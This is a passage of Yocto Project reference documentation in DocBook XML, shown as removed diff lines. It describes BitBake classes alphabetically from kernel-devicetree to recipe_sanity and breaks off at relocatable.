-<section id='ref-classes-kernel-devicetree'>
-    <title><filename>kernel-devicetree.bbclass</filename></title>
-
-    <para>
-        The <filename>kernel-devicetree</filename> class, which is inherited by
-        the
-        <link linkend='ref-classes-kernel'><filename>kernel</filename></link>
-        class, supports device tree generation.
-    </para>
-</section>
-
-<section id='ref-classes-kernel-fitimage'>
-    <title><filename>kernel-fitimage.bbclass</filename></title>
-
-    <para>
-        The <filename>kernel-fitimage</filename> class provides support to
-        pack zImages.
-    </para>
-</section>
-
-<section id='ref-classes-kernel-grub'>
-    <title><filename>kernel-grub.bbclass</filename></title>
-
-    <para>
-        The <filename>kernel-grub</filename> class updates the boot area and
-        the boot menu with the kernel as the priority boot mechanism while
-        installing a RPM to update the kernel on a deployed target.
-    </para>
-</section>
-
-<section id='ref-classes-kernel-module-split'>
-    <title><filename>kernel-module-split.bbclass</filename></title>
-
-    <para>
-        The <filename>kernel-module-split</filename> class
-        provides common functionality for splitting Linux kernel modules into
-        separate packages.
-    </para>
-</section>
-
-<section id='ref-classes-kernel-uboot'>
-    <title><filename>kernel-uboot.bbclass</filename></title>
-
-    <para>
-        The <filename>kernel-uboot</filename> class provides support for
-        building from vmlinux-style kernel sources.
-    </para>
-</section>
-
-<section id='ref-classes-kernel-uimage'>
-    <title><filename>kernel-uimage.bbclass</filename></title>
-
-    <para>
-        The <filename>kernel-uimage</filename> class provides support to
-        pack uImage.
-    </para>
-</section>
-
-<section id='ref-classes-kernel-yocto'>
-    <title><filename>kernel-yocto.bbclass</filename></title>
-
-    <para>
-        The <filename>kernel-yocto</filename> class
-        provides common functionality for building from linux-yocto style
-        kernel source repositories.
-    </para>
-</section>
-
-<section id='ref-classes-kernelsrc'>
-    <title><filename>kernelsrc.bbclass</filename></title>
-
-    <para>
-        The <filename>kernelsrc</filename> class sets the Linux kernel
-        source and version.
-    </para>
-</section>
-
-<section id='ref-classes-lib_package'>
-    <title><filename>lib_package.bbclass</filename></title>
-
-    <para>
-        The <filename>lib_package</filename> class
-        supports recipes that build libraries and produce executable
-        binaries, where those binaries should not be installed by default
-        along with the library.
-        Instead, the binaries are added to a separate
-        <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}-bin</filename>
-        package to make their installation optional.
-    </para>
-</section>
-
-<section id='ref-classes-libc*'>
-    <title><filename>libc*.bbclass</filename></title>
-
-    <para>
-        The <filename>libc*</filename> classes support recipes that build
-        packages with <filename>libc</filename>:
-        <itemizedlist>
-            <listitem><para>The <filename>libc-common</filename> class
-                provides common support for building with
-                <filename>libc</filename>.
-                </para></listitem>
-            <listitem><para>The <filename>libc-package</filename> class
-                supports packaging up <filename>glibc</filename> and
-                <filename>eglibc</filename>.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-<section id='ref-classes-license'>
-    <title><filename>license.bbclass</filename></title>
-
-    <para>
-        The <filename>license</filename> class provides license
-        manifest creation and license exclusion.
-        This class is enabled by default using the default value for the
-        <link linkend='var-INHERIT_DISTRO'><filename>INHERIT_DISTRO</filename></link>
-        variable.
-    </para>
-</section>
-
-<section id='ref-classes-linux-kernel-base'>
-    <title><filename>linux-kernel-base.bbclass</filename></title>
-
-    <para>
-        The <filename>linux-kernel-base</filename> class
-        provides common functionality for recipes that build out of the Linux
-        kernel source tree.
-        These builds goes beyond the kernel itself.
-        For example, the Perf recipe also inherits this class.
-    </para>
-</section>
-
-<section id='ref-classes-linuxloader'>
-    <title><filename>linuxloader.bbclass</filename></title>
-
-    <para>
-        Provides the function <filename>linuxloader()</filename>, which gives
-        the value of the dynamic loader/linker provided on the platform.
-        This value is used by a number of other classes.
-    </para>
-</section>
-
-<section id='ref-classes-logging'>
-    <title><filename>logging.bbclass</filename></title>
-
-    <para>
-        The <filename>logging</filename> class provides the standard
-        shell functions used to log messages for various BitBake severity levels
-        (i.e. <filename>bbplain</filename>, <filename>bbnote</filename>,
-        <filename>bbwarn</filename>, <filename>bberror</filename>,
-        <filename>bbfatal</filename>, and <filename>bbdebug</filename>).
-    </para>
-
-    <para>
-        This class is enabled by default since it is inherited by
-        the <filename>base</filename> class.
-    </para>
-</section>
-
-<section id='ref-classes-meta'>
-    <title><filename>meta.bbclass</filename></title>
-
-    <para>
-        The <filename>meta</filename> class is inherited by recipes
-        that do not build any output packages themselves, but act as a "meta"
-        target for building other recipes.
-    </para>
-</section>
-
-<section id='ref-classes-metadata_scm'>
-    <title><filename>metadata_scm.bbclass</filename></title>
-
-    <para>
-        The <filename>metadata_scm</filename> class provides functionality for
-        querying the branch and revision of a Source Code Manager (SCM)
-        repository.
-    </para>
-
-    <para>
-        The <link linkend='ref-classes-base'><filename>base</filename></link>
-        class uses this class to print the revisions of each layer before
-        starting every build.
-        The <filename>metadata_scm</filename> class is enabled by default
-        because it is inherited by the <filename>base</filename> class.
-    </para>
-</section>
-
-<section id='ref-classes-migrate_localcount'>
-    <title><filename>migrate_localcount.bbclass</filename></title>
-
-    <para>
-        The <filename>migrate_localcount</filename> class verifies a recipe's
-        localcount data and increments it appropriately.
-    </para>
-</section>
-
-<section id='ref-classes-mime'>
-    <title><filename>mime.bbclass</filename></title>
-
-    <para>
-        The <filename>mime</filename> class generates the proper
-        post-install and post-remove (postinst/postrm) scriptlets for packages
-        that install MIME type files.
-        These scriptlets call <filename>update-mime-database</filename> to add
-        the MIME types to the shared database.
-    </para>
-</section>
-
-<section id='ref-classes-mirrors'>
-    <title><filename>mirrors.bbclass</filename></title>
-
-    <para>
-        The <filename>mirrors</filename> class sets up some standard
-        <link linkend='var-MIRRORS'><filename>MIRRORS</filename></link> entries
-        for source code mirrors.
-        These mirrors provide a fall-back path in case the upstream source
-        specified in
-        <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
-        within recipes is unavailable.
-    </para>
-
-    <para>
-        This class is enabled by default since it is inherited by the
-        <link linkend='ref-classes-base'><filename>base</filename></link> class.
-    </para>
-</section>
-
-<section id='ref-classes-module'>
-    <title><filename>module.bbclass</filename></title>
-
-    <para>
-        The <filename>module</filename> class provides support for building
-        out-of-tree Linux kernel modules.
-        The class inherits the
-        <link linkend='ref-classes-module-base'><filename>module-base</filename></link>
-        and
-        <link linkend='ref-classes-kernel-module-split'><filename>kernel-module-split</filename></link>
-        classes, and implements the
-        <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
-        and
-        <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-        tasks.
-        The class provides everything needed to build and package a kernel
-        module.
-    </para>
-
-    <para>
-        For general information on out-of-tree Linux kernel modules, see the
-        "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#incorporating-out-of-tree-modules'>Incorporating Out-of-Tree Modules</ulink>"
-        section in the Yocto Project Linux Kernel Development Manual.
-    </para>
-</section>
-
-<section id='ref-classes-module-base'>
-    <title><filename>module-base.bbclass</filename></title>
-
-    <para>
-        The <filename>module-base</filename> class provides the base
-        functionality for building Linux kernel modules.
-        Typically, a recipe that builds software that includes one or
-        more kernel modules and has its own means of building
-        the module inherits this class as opposed to inheriting the
-        <link linkend='ref-classes-module'><filename>module</filename></link>
-        class.
-    </para>
-</section>
-
-<section id='ref-classes-multilib*'>
-    <title><filename>multilib*.bbclass</filename></title>
-
-    <para>
-        The <filename>multilib*</filename> classes provide support
-        for building libraries with different target optimizations or target
-        architectures and installing them side-by-side in the same image.
-    </para>
-
-    <para>
-        For more information on using the Multilib feature, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#combining-multiple-versions-library-files-into-one-image'>Combining Multiple Versions of Library Files into One Image</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-</section>
-
-<section id='ref-classes-native'>
-    <title><filename>native.bbclass</filename></title>
-
-    <para>
-        The <filename>native</filename> class provides common
-        functionality for recipes that build tools to run on the
-        <link linkend='hardware-build-system-term'>build host</link>
-        (i.e. tools that use the compiler or other tools from the
-        build host).
-    </para>
-
-    <para>
-        You can create a recipe that builds tools that run natively on the
-        host a couple different ways:
-        <itemizedlist>
-            <listitem><para>
-                Create a
-                <replaceable>myrecipe</replaceable><filename>-native.bb</filename>
-                recipe that inherits the <filename>native</filename> class.
-                If you use this method, you must order the inherit statement
-                in the recipe after all other inherit statements so that the
-                <filename>native</filename> class is inherited last.
-                <note><title>Warning</title>
-                    When creating a recipe this way, the recipe name must
-                    follow this naming convention:
-                    <literallayout class='monospaced'>
-     <replaceable>myrecipe</replaceable>-native.bb
-                    </literallayout>
-                    Not using this naming convention can lead to subtle
-                    problems caused by existing code that depends on that
-                    naming convention.
-                </note>
-                </para></listitem>
-            <listitem><para>
-                Create or modify a target recipe that contains the following:
-                <literallayout class='monospaced'>
-     <link linkend='var-BBCLASSEXTEND'><filename>BBCLASSEXTEND</filename></link> = "native"
-                </literallayout>
-                Inside the recipe, use <filename>_class-native</filename> and
-                <filename>_class-target</filename> overrides to specify any
-                functionality specific to the respective native or target
-                case.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        Although applied differently, the <filename>native</filename> class is
-        used with both methods.
-        The advantage of the second method is that you do not need to have two
-        separate recipes (assuming you need both) for native and target.
-        All common parts of the recipe are automatically shared.
-    </para>
-</section>
-
-<section id='ref-classes-nativesdk'>
-    <title><filename>nativesdk.bbclass</filename></title>
-
-    <para>
-        The <filename>nativesdk</filename> class provides common
-        functionality for recipes that wish to build tools to run as part of
-        an SDK (i.e. tools that run on
-        <link linkend='var-SDKMACHINE'><filename>SDKMACHINE</filename></link>).
-    </para>
-
-    <para>
-        You can create a recipe that builds tools that run on the SDK machine
-        a couple different ways:
-        <itemizedlist>
-            <listitem><para>Create a
-                <filename>nativesdk-</filename><replaceable>myrecipe</replaceable><filename>.bb</filename>
-                recipe that inherits the <filename>nativesdk</filename> class.
-                If you use this method, you must order the inherit statement
-                in the recipe after all other inherit statements so that the
-                <filename>nativesdk</filename> class is inherited last.
-                </para></listitem>
-            <listitem><para>Create a <filename>nativesdk</filename> variant
-                of any recipe by adding the following:
-                <literallayout class='monospaced'>
-     <link linkend='var-BBCLASSEXTEND'><filename>BBCLASSEXTEND</filename></link> = "nativesdk"
-                </literallayout>
-                Inside the recipe, use <filename>_class-nativesdk</filename> and
-                <filename>_class-target</filename> overrides to specify any
-                functionality specific to the respective SDK machine or target
-                case.</para></listitem>
-        </itemizedlist>
-        <note><title>Warning</title>
-            When creating a recipe, you must follow this naming convention:
-            <literallayout class='monospaced'>
-     nativesdk-<replaceable>myrecipe</replaceable>.bb
-            </literallayout>
-            Not doing so can lead to subtle problems because code exists
-            that depends on the naming convention.
-        </note>
-    </para>
-
-    <para>
-        Although applied differently, the <filename>nativesdk</filename> class
-        is used with both methods.
-        The advantage of the second method is that you do not need to have two
-        separate recipes (assuming you need both) for the SDK machine and the
-        target.
-        All common parts of the recipe are automatically shared.
-    </para>
-</section>
-
-<section id='ref-classes-nopackages'>
-    <title><filename>nopackages.bbclass</filename></title>
-
-    <para>
-        Disables packaging tasks for those recipes and classes where
-        packaging is not needed.
-    </para>
-</section>
-
-<section id='ref-classes-npm'>
-    <title><filename>npm.bbclass</filename></title>
-
-    <para>
-        Provides support for building Node.js software fetched using the
-        <ulink url='https://en.wikipedia.org/wiki/Npm_(software)'>node package manager (NPM)</ulink>.
-        <note>
-            Currently, recipes inheriting this class must use the
-            <filename>npm://</filename> fetcher to have dependencies fetched
-            and packaged automatically.
-        </note>
-        For information on how to create NPM packages, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-node-package-manager-npm-packages'>Creating Node Package Manager (NPM) Packages</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-</section>
-
-<section id='ref-classes-oelint'>
-    <title><filename>oelint.bbclass</filename></title>
-
-    <para>
-        The <filename>oelint</filename> class is an
-        obsolete lint checking tool that exists in
-        <filename>meta/classes</filename> in the
-        <link linkend='source-directory'>Source Directory</link>.
-    </para>
-
-    <para>
-        A number of classes exist that could be generally useful in
-        OE-Core but are never actually used within OE-Core itself.
-        The <filename>oelint</filename> class is one such example.
-        However, being aware of this class can reduce the proliferation of
-        different versions of similar classes across multiple layers.
-    </para>
-</section>
-
-<section id='ref-classes-own-mirrors'>
-    <title><filename>own-mirrors.bbclass</filename></title>
-
-    <para>
-        The <filename>own-mirrors</filename> class makes it
-        easier to set up your own
-        <link linkend='var-PREMIRRORS'><filename>PREMIRRORS</filename></link>
-        from which to first fetch source before attempting to fetch it from the
-        upstream specified in
-        <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
-        within each recipe.
-    </para>
-
-    <para>
-        To use this class, inherit it globally and specify
-        <link linkend='var-SOURCE_MIRROR_URL'><filename>SOURCE_MIRROR_URL</filename></link>.
-        Here is an example:
-        <literallayout class='monospaced'>
-     INHERIT += "own-mirrors"
-     SOURCE_MIRROR_URL = "http://example.com/my-source-mirror"
-        </literallayout>
-        You can specify only a single URL in
-        <filename>SOURCE_MIRROR_URL</filename>.
-    </para>
-</section>
-
-<section id='ref-classes-package'>
-    <title><filename>package.bbclass</filename></title>
-
-    <para>
-        The <filename>package</filename> class supports generating
-        packages from a build's output.
-        The core generic functionality is in
-        <filename>package.bbclass</filename>.
-        The code specific to particular package types resides in these
-        package-specific classes:
-        <link linkend='ref-classes-package_deb'><filename>package_deb</filename></link>,
-        <link linkend='ref-classes-package_rpm'><filename>package_rpm</filename></link>,
-        <link linkend='ref-classes-package_ipk'><filename>package_ipk</filename></link>,
-        and
-        <link linkend='ref-classes-package_tar'><filename>package_tar</filename></link>.
-        <note><title>Warning</title>
-            The <filename>package_tar</filename> class is broken and not
-            supported.
-            It is recommended that you do not use this class.
-        </note>
-    </para>
-
-    <para>
-        You can control the list of resulting package formats by using the
-        <filename><link linkend='var-PACKAGE_CLASSES'>PACKAGE_CLASSES</link></filename>
-        variable defined in your <filename>conf/local.conf</filename>
-        configuration file, which is located in the
-        <link linkend='build-directory'>Build Directory</link>.
-        When defining the variable, you can specify one or more package types.
-        Since images are generated from packages, a packaging class is
-        needed to enable image generation.
-        The first class listed in this variable is used for image generation.
-    </para>
-
-    <para>
-        If you take the optional step to set up a repository (package feed)
-        on the development host that can be used by DNF, you can
-        install packages from the feed while you are running the image
-        on the target (i.e. runtime installation of packages).
-        For more information, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#using-runtime-package-management'>Using Runtime Package Management</ulink>"
-         section in the Yocto Project Development Tasks Manual.
-    </para>
-
-    <para>
-        The package-specific class you choose can affect build-time performance
-        and has space ramifications.
-        In general, building a package with IPK takes about thirty percent less
-        time as compared to using RPM to build the same or similar package.
-        This comparison takes into account a complete build of the package with
-        all dependencies previously built.
-        The reason for this discrepancy is because the RPM package manager
-        creates and processes more
-        <link linkend='metadata'>Metadata</link> than the
-        IPK package manager.
-        Consequently, you might consider setting
-        <filename>PACKAGE_CLASSES</filename> to "package_ipk" if you are
-        building smaller systems.
-    </para>
-
-    <para>
-        Before making your package manager decision, however, you should
-        consider some further things about using RPM:
-        <itemizedlist>
-            <listitem><para>
-                RPM starts to provide more abilities than IPK due to
-                the fact that it processes more Metadata.
-                For example, this information includes individual file types,
-                file checksum generation and evaluation on install, sparse file
-                support, conflict detection and resolution for Multilib systems,
-                ACID style upgrade, and repackaging abilities for rollbacks.
-                </para></listitem>
-            <listitem><para>
-                For smaller systems, the extra space used for the Berkeley
-                Database and the amount of metadata when using RPM can affect
-                your ability to perform on-device upgrades.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        You can find additional information on the effects of the package
-        class at these two Yocto Project mailing list links:
-        <itemizedlist>
-            <listitem><para><ulink url='&YOCTO_LISTS_URL;/pipermail/poky/2011-May/006362.html'>
-                https://lists.yoctoproject.org/pipermail/poky/2011-May/006362.html</ulink></para></listitem>
-            <listitem><para><ulink url='&YOCTO_LISTS_URL;/pipermail/poky/2011-May/006363.html'>
-                https://lists.yoctoproject.org/pipermail/poky/2011-May/006363.html</ulink></para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-<section id='ref-classes-package_deb'>
-    <title><filename>package_deb.bbclass</filename></title>
-
-    <para>
-        The <filename>package_deb</filename> class
-        provides support for creating packages that use the Debian
-        (i.e. <filename>.deb</filename>) file format.
-        The class ensures the packages are written out in a
-        <filename>.deb</filename> file format to the
-        <filename>${</filename><link linkend='var-DEPLOY_DIR_DEB'><filename>DEPLOY_DIR_DEB</filename></link><filename>}</filename>
-        directory.
-    </para>
-
-    <para>
-        This class inherits the
-        <link linkend='ref-classes-package'><filename>package</filename></link>
-        class and is enabled through the
-        <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
-        variable in the <filename>local.conf</filename> file.
-    </para>
-</section>
-
-<section id='ref-classes-package_ipk'>
-    <title><filename>package_ipk.bbclass</filename></title>
-
-    <para>
-        The <filename>package_ipk</filename> class
-        provides support for creating packages that use the IPK
-        (i.e. <filename>.ipk</filename>) file format.
-        The class ensures the packages are written out in a
-        <filename>.ipk</filename> file format to the
-        <filename>${</filename><link linkend='var-DEPLOY_DIR_IPK'><filename>DEPLOY_DIR_IPK</filename></link><filename>}</filename>
-        directory.
-    </para>
-
-    <para>
-        This class inherits the
-        <link linkend='ref-classes-package'><filename>package</filename></link>
-        class and is enabled through the
-        <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
-        variable in the <filename>local.conf</filename> file.
-    </para>
-</section>
-
-<section id='ref-classes-package_rpm'>
-    <title><filename>package_rpm.bbclass</filename></title>
-
-    <para>
-        The <filename>package_rpm</filename> class
-        provides support for creating packages that use the RPM
-        (i.e. <filename>.rpm</filename>) file format.
-        The class ensures the packages are written out in a
-        <filename>.rpm</filename> file format to the
-        <filename>${</filename><link linkend='var-DEPLOY_DIR_RPM'><filename>DEPLOY_DIR_RPM</filename></link><filename>}</filename>
-        directory.
-    </para>
-
-    <para>
-        This class inherits the
-        <link linkend='ref-classes-package'><filename>package</filename></link>
-        class and is enabled through the
-        <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
-        variable in the <filename>local.conf</filename> file.
-    </para>
-</section>
-
-<section id='ref-classes-package_tar'>
-    <title><filename>package_tar.bbclass</filename></title>
-
-    <para>
-        The <filename>package_tar</filename> class
-        provides support for creating tarballs.
-        The class ensures the packages are written out in a
-        tarball format to the
-        <filename>${</filename><link linkend='var-DEPLOY_DIR_TAR'><filename>DEPLOY_DIR_TAR</filename></link><filename>}</filename>
-        directory.
-    </para>
-
-    <para>
-        This class inherits the
-        <link linkend='ref-classes-package'><filename>package</filename></link>
-        class and is enabled through the
-        <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
-        variable in the <filename>local.conf</filename> file.
-        <note>
-            You cannot specify the <filename>package_tar</filename> class
-            first using the <filename>PACKAGE_CLASSES</filename> variable.
-            You must use <filename>.deb</filename>,
-            <filename>.ipk</filename>, or <filename>.rpm</filename> file
-            formats for your image or SDK.
-        </note>
-    </para>
-</section>
-
-<section id='ref-classes-packagedata'>
-    <title><filename>packagedata.bbclass</filename></title>
-
-    <para>
-        The <filename>packagedata</filename> class provides
-        common functionality for reading <filename>pkgdata</filename> files
-        found in
-        <link linkend='var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></link>.
-        These files contain information about each output package produced by
-        the OpenEmbedded build system.
-    </para>
-
-    <para>
-        This class is enabled by default because it is inherited by the
-        <link linkend='ref-classes-package'><filename>package</filename></link>
-        class.
-    </para>
-</section>
-
-<section id='ref-classes-packagegroup'>
-    <title><filename>packagegroup.bbclass</filename></title>
-
-    <para>
-        The <filename>packagegroup</filename> class sets default values
-        appropriate for package group recipes (e.g.
-        <filename><link linkend='var-PACKAGES'>PACKAGES</link></filename>,
-        <filename><link linkend='var-PACKAGE_ARCH'>PACKAGE_ARCH</link></filename>,
-        <filename><link linkend='var-ALLOW_EMPTY'>ALLOW_EMPTY</link></filename>,
-        and so forth).
-        It is highly recommended that all package group recipes inherit this class.
-    </para>
-
-    <para>
-        For information on how to use this class, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#usingpoky-extend-customimage-customtasks'>Customizing Images Using Custom Package Groups</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-
-    <para>
-        Previously, this class was called the <filename>task</filename> class.
-    </para>
-</section>
-
-<section id='ref-classes-patch'>
-    <title><filename>patch.bbclass</filename></title>
-
-    <para>
-        The <filename>patch</filename> class provides all functionality for
-        applying patches during the
-        <link linkend='ref-tasks-patch'><filename>do_patch</filename></link>
-        task.
-    </para>
-
-    <para>
-        This class is enabled by default because it is inherited by the
-        <link linkend='ref-classes-base'><filename>base</filename></link>
-        class.
-    </para>
-</section>
-
-<section id='ref-classes-perlnative'>
-    <title><filename>perlnative.bbclass</filename></title>
-
-    <para>
-        When inherited by a recipe, the <filename>perlnative</filename> class
-        supports using the native version of Perl built by the build system
-        rather than using the version provided by the build host.
-    </para>
-</section>
-
-<section id='ref-classes-pixbufcache'>
-    <title><filename>pixbufcache.bbclass</filename></title>
-
-    <para>
-        The <filename>pixbufcache</filename> class generates the proper
-        post-install and post-remove (postinst/postrm) scriptlets for packages
-        that install pixbuf loaders, which are used with
-        <filename>gdk-pixbuf</filename>.
-        These scriptlets call <filename>update_pixbuf_cache</filename>
-        to add the pixbuf loaders to the cache.
-        Since the cache files are architecture-specific,
-        <filename>update_pixbuf_cache</filename> is run using QEMU if the
-        postinst scriptlets need to be run on the build host during image
-        creation.
-    </para>
-
-    <para>
-        If the pixbuf loaders being installed are in packages other
-        than the recipe's main package, set
-        <link linkend='var-PIXBUF_PACKAGES'><filename>PIXBUF_PACKAGES</filename></link>
-        to specify the packages containing the loaders.
-    </para>
-</section>
-
-<section id='ref-classes-pkgconfig'>
-    <title><filename>pkgconfig.bbclass</filename></title>
-
-    <para>
-        The <filename>pkgconfig</filename> class provides a standard way to get
-        header and library information by using <filename>pkg-config</filename>.
-        This class aims to smooth integration of
-        <filename>pkg-config</filename> into libraries that use it.
-    </para>
-
-    <para>
-        During staging, BitBake installs <filename>pkg-config</filename>
-        data into the <filename>sysroots/</filename> directory.
-        By making use of sysroot functionality within
-        <filename>pkg-config</filename>, the <filename>pkgconfig</filename>
-        class no longer has to manipulate the files.
-    </para>
-</section>
-
-<section id='ref-classes-populate-sdk'>
-    <title><filename>populate_sdk.bbclass</filename></title>
-
-    <para>
-        The <filename>populate_sdk</filename> class provides support for
-        SDK-only recipes.
-        For information on advantages gained when building a cross-development
-        toolchain using the
-        <link linkend='ref-tasks-populate_sdk'><filename>do_populate_sdk</filename></link>
-        task, see the
-        "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-building-an-sdk-installer'>Building an SDK Installer</ulink>"
-        section in the Yocto Project Application Development and the
-        Extensible Software Development Kit (eSDK) manual.
-    </para>
-</section>
-
-<section id='ref-classes-populate-sdk-*'>
-    <title><filename>populate_sdk_*.bbclass</filename></title>
-
-    <para>
-        The <filename>populate_sdk_*</filename> classes support SDK creation
-        and consist of the following classes:
-        <itemizedlist>
-            <listitem><para><emphasis><filename>populate_sdk_base</filename>:</emphasis>
-                The base class supporting SDK creation under all package
-                managers (i.e. DEB, RPM, and opkg).</para></listitem>
-            <listitem><para><emphasis><filename>populate_sdk_deb</filename>:</emphasis>
-                Supports creation of the SDK given the Debian package manager.
-                </para></listitem>
-            <listitem><para><emphasis><filename>populate_sdk_rpm</filename>:</emphasis>
-                Supports creation of the SDK given the RPM package manager.
-                </para></listitem>
-            <listitem><para><emphasis><filename>populate_sdk_ipk</filename>:</emphasis>
-                Supports creation of the SDK given the opkg (IPK format)
-                package manager.
-                </para></listitem>
-            <listitem><para><emphasis><filename>populate_sdk_ext</filename>:</emphasis>
-                Supports extensible SDK creation under all package managers.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        The <filename>populate_sdk_base</filename> class inherits the
-        appropriate <filename>populate_sdk_*</filename> (i.e.
-        <filename>deb</filename>, <filename>rpm</filename>, and
-        <filename>ipk</filename>) based on
-        <link linkend='var-IMAGE_PKGTYPE'><filename>IMAGE_PKGTYPE</filename></link>.
-    </para>
-
-    <para>
-        The base class ensures all source and destination directories are
-        established and then populates the SDK.
-        After populating the SDK, the <filename>populate_sdk_base</filename>
-        class constructs two sysroots:
-        <filename>${</filename><link linkend='var-SDK_ARCH'><filename>SDK_ARCH</filename></link><filename>}-nativesdk</filename>,
-        which contains the cross-compiler and associated tooling, and the
-        target, which contains a target root filesystem that is configured for
-        the SDK usage.
-        These two images reside in
-        <link linkend='var-SDK_OUTPUT'><filename>SDK_OUTPUT</filename></link>,
-        which consists of the following:
-        <literallayout class='monospaced'>
-     ${SDK_OUTPUT}/${SDK_ARCH}<replaceable>-nativesdk-pkgs</replaceable>
-     ${SDK_OUTPUT}/${SDKTARGETSYSROOT}/<replaceable>target-pkgs</replaceable>
-        </literallayout>
-    </para>
-
-    <para>
-        Finally, the base populate SDK class creates the toolchain
-        environment setup script, the tarball of the SDK, and the installer.
-    </para>
-
-    <para>
-        The respective <filename>populate_sdk_deb</filename>,
-        <filename>populate_sdk_rpm</filename>, and
-        <filename>populate_sdk_ipk</filename> classes each support the
-        specific type of SDK.
-        These classes are inherited by and used with the
-        <filename>populate_sdk_base</filename> class.
-    </para>
-
-    <para>
-        For more information on the cross-development toolchain
-        generation, see the
-        "<ulink url='&YOCTO_DOCS_OM_URL;#cross-development-toolchain-generation'>Cross-Development Toolchain Generation</ulink>"
-        section in the Yocto Project Overview and Concepts Manual.
-        For information on advantages gained when building a
-        cross-development toolchain using the
-        <link linkend='ref-tasks-populate_sdk'><filename>do_populate_sdk</filename></link>
-        task, see the
-        "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-building-an-sdk-installer'>Building an SDK Installer</ulink>"
-        section in the Yocto Project Application Development and the
-        Extensible Software Development Kit (eSDK) manual.
-    </para>
-</section>
-
-<section id='ref-classes-prexport'>
-    <title><filename>prexport.bbclass</filename></title>
-
-    <para>
-        The <filename>prexport</filename> class provides functionality for
-        exporting
-        <link linkend='var-PR'><filename>PR</filename></link> values.
-        <note>
-            This class is not intended to be used directly.
-            Rather, it is enabled when using
-            "<filename>bitbake-prserv-tool export</filename>".
-        </note>
-    </para>
-</section>
-
-<section id='ref-classes-primport'>
-    <title><filename>primport.bbclass</filename></title>
-
-    <para>
-        The <filename>primport</filename> class provides functionality for
-        importing
-        <link linkend='var-PR'><filename>PR</filename></link> values.
-        <note>
-            This class is not intended to be used directly.
-            Rather, it is enabled when using
-            "<filename>bitbake-prserv-tool import</filename>".
-        </note>
-    </para>
-</section>
-
-<section id='ref-classes-prserv'>
-    <title><filename>prserv.bbclass</filename></title>
-
-    <para>
-        The <filename>prserv</filename> class provides functionality for
-        using a
-        <ulink url='&YOCTO_DOCS_DEV_URL;#working-with-a-pr-service'>PR service</ulink>
-        in order to automatically manage the incrementing of the
-        <link linkend='var-PR'><filename>PR</filename></link> variable for
-        each recipe.
-    </para>
-
-    <para>
-        This class is enabled by default because it is inherited by the
-        <link linkend='ref-classes-package'><filename>package</filename></link>
-        class.
-        However, the OpenEmbedded build system will not enable the
-        functionality of this class unless
-        <link linkend='var-PRSERV_HOST'><filename>PRSERV_HOST</filename></link>
-        has been set.
-    </para>
-</section>
-
-<section id='ref-classes-ptest'>
-    <title><filename>ptest.bbclass</filename></title>
-
-    <para>
-        The <filename>ptest</filename> class provides functionality for
-        packaging and installing runtime tests for recipes that build software
-        that provides these tests.
-    </para>
-
-    <para>
-        This class is intended to be inherited by individual recipes.
-        However, the class' functionality is largely disabled unless "ptest"
-        appears in
-        <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.
-        See the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#testing-packages-with-ptest'>Testing Packages With ptest</ulink>"
-        section in the Yocto Project Development Tasks Manual for more
-        information on ptest.
-    </para>
-</section>
-
-<section id='ref-classes-ptest-gnome'>
-    <title><filename>ptest-gnome.bbclass</filename></title>
-
-    <para>
-        Enables package tests (ptests) specifically for GNOME packages,
-        which have tests intended to be executed with
-        <filename>gnome-desktop-testing</filename>.
-    </para>
-
-    <para>
-        For information on setting up and running ptests, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#testing-packages-with-ptest'>Testing Packages With ptest</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-</section>
-
-<section id='ref-classes-python-dir'>
-    <title><filename>python-dir.bbclass</filename></title>
-
-    <para>
-        The <filename>python-dir</filename> class provides the base version,
-        location, and site package location for Python.
-    </para>
-</section>
-
-<section id='ref-classes-python3native'>
-    <title><filename>python3native.bbclass</filename></title>
-
-    <para>
-        The <filename>python3native</filename> class supports using the
-        native version of Python 3 built by the build system rather than
-        support of the version provided by the build host.
-    </para>
-</section>
-
-<section id='ref-classes-pythonnative'>
-    <title><filename>pythonnative.bbclass</filename></title>
-
-    <para>
-        When inherited by a recipe, the <filename>pythonnative</filename> class
-        supports using the native version of Python built by the build system
-        rather than using the version provided by the build host.
-    </para>
-</section>
-
-<section id='ref-classes-qemu'>
-    <title><filename>qemu.bbclass</filename></title>
-
-    <para>
-        The <filename>qemu</filename> class provides functionality for recipes
-        that either need QEMU or test for the existence of QEMU.
-        Typically, this class is used to run programs for a target system on
-        the build host using QEMU's application emulation mode.
-    </para>
-</section>
-
-<section id='ref-classes-recipe_sanity'>
-    <title><filename>recipe_sanity.bbclass</filename></title>
-
-    <para>
-        The <filename>recipe_sanity</filename> class checks for the presence
-        of any host system recipe prerequisites that might affect the
-        build (e.g. variables that are set or software that is present).
-    </para>
-</section>
-
-<section id='ref-classes-relocatable'>
-    <title><filename>relocatable.bbclass</filename></title>
-
-    <para>
